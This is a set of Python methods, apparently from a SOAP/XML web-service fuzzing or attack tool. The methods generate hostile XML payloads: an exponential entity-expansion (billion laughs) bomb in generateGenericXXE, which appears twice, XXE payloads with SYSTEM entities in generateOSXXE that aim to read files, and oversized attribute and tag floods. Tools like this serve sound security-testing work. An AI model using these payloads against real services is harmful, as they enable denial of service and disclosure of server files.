def generateXMLGarbage(self): str = gt = gtc = '' rnd = attackUtils.genRandom(100, b64=True) rnd_tag = attackUtils.genRandom(30, b64=True) final = [] for i in range(101): str = str + " a=\"%d\"" % i final.append('<%s' % rnd_tag) final.append(str) final.append('>') for i in range(21): gt = gt + '<%s>' % rnd_tag gtc = gtc + '</%s>' % rnd_tag final.append(gt) # add an incomplete set of tags here self.addstring(''.join(final), 'tags') final.append(rnd) final.append('\n') final.append(gtc) final.append('</%s>' % rnd_tag) # add the complete XML set of tagged data here self.addstring(''.join(final), 'tags')
def __init__(self): self.wssecurity = [] self.xml = {} self.getTags() self.rnd = attackUtils.genRandom(300, b64=True) self.rndUser = attackUtils.genRandom(300, b64=True) self.rndPass = attackUtils.genRandom(300, b64=True) self.rnd3 = attackUtils.genRandom(3000, b64=True) self.rnd6 = attackUtils.genRandom(6000, b64=True)
def generateGenericXXE(self, val=101): rnd = attackUtils.genRandom(100, b64=True) rnd_tag = attackUtils.genRandom(30, b64=True) soapStr = StringIO() soapStr.write(self.xml["xh"]) soapStr.write('<!DOCTYPE %s [<!ENTITY x0 \"' % rnd_tag) soapStr.write(rnd) soapStr.write('\">') for i in range(1, val): x = i - 1 soapStr.write('<!ENTITY x%s \"&x%s;&x%s;\">' % (i, x, x)) soapStr.write(']>') soapStr.write('<%s>&x%d;</%s>' % (rnd_tag, val - 1, rnd_tag)) self.addstring(soapStr, 'entity')
def generateGenericXXE(self, val=101): rnd = attackUtils.genRandom(100, b64=True) rnd_tag = attackUtils.genRandom(30, b64=True) soapStr = StringIO() soapStr.write(self.xml["xh"]) soapStr.write('<!DOCTYPE %s [<!ENTITY x0 \"' % rnd_tag) soapStr.write(rnd) soapStr.write('\">') for i in range(1, val): x = i-1 soapStr.write('<!ENTITY x%s \"&x%s;&x%s;\">' % (i, x, x)) soapStr.write(']>') soapStr.write('<%s>&x%d;</%s>' % (rnd_tag, val-1, rnd_tag)) self.addstring(soapStr, 'entity')
def generateOSXXE(self): for attack in self.attacks: rnd_tag = attackUtils.genRandom(30, b64=True) soapStr = StringIO() soapStr.write(self.xml["xh"]) soapStr.write('<!DOCTYPE %s [' % rnd_tag) soapStr.write('<!ELEMENT %s ANY>' % rnd_tag) soapStr.write('<!ENTITY xxe SYSTEM \"%s\">' % attack) soapStr.write(']>') soapStr.write('<%s>&xxe;</%s>' % (rnd_tag, rnd_tag)) self.addstring(soapStr, 'entity')
def generateTagAttacks(self, param): rnd = attackUtils.genRandom(200, b64=True) final = [] final.append('<') final.append(param) final.append('>') # generate a bunch of legit looking open tags self.generateXMLFuzzData(''.join(final), 256, 64, 'tags') final.append('%s</' % rnd) final.append(param) final.append('>') # generate a complete set of legit looking XML tags self.generateXMLFuzzData(''.join(final), 256, 64, 'tags') # generate a bunch of legit looking close tags self.generateXMLFuzzData('</' + param + '>', 256, 64, 'tags')